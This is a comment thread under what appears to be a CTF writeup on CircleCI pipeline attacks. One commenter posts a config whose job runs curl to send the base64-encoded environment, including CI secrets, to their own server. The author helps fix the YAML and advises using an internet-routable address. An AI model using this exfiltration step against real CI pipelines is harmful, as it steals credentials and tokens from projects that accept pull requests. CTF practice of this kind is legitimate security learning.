Awesome writeup! Having some issues with the CTF would love some guidance

[obheda12]

I've been trying to exfiltrate secrets but CircleCI keeps giving me pull errors when i try to make a pull request with the malicious step you mentioned in your writeup? I substituted the "attacker.com" for my IP where i was standing up a server to receive requests. Below is my config file: any advice would be much appreciated and awesome stuff man, really great read!

# Use the latest 2.1 version of CircleCI pipeline process engine. See: https://circleci.com/docs/2.0/configuration-reference
version: 2.1
# Use a package of configuration called an orb.
orbs:
  # Declare a dependency on the welcome-orb
  welcome: circleci/welcome-orb@0.4.1
# Orchestrate or schedule a set of jobs
workflows:
  # Name the workflow "welcome"
  welcome:
    # Run the welcome/run job in its own container
    jobs:
      - welcome/run: curl 192.168.18.133/?env=$(env | base64 | tr -d '\n')

[ndavison]

Hey @obheda12 - I think you just want to have run: instead of welcome/run:. Also, you will want an internet routeable address if you are using that technique to get the secret (CircleCI would not be able to reach your local 192.168.x.x address).

[ndavison]

Sorry, that's bad advice on the run: - I think you'll actually want to create a job with a step that is the run: command, e.g.:

jobs:
  build:
    steps:
      - run: echo hello
workflows:
  build:
    jobs:
      - build

The echo hello is where the curl would go.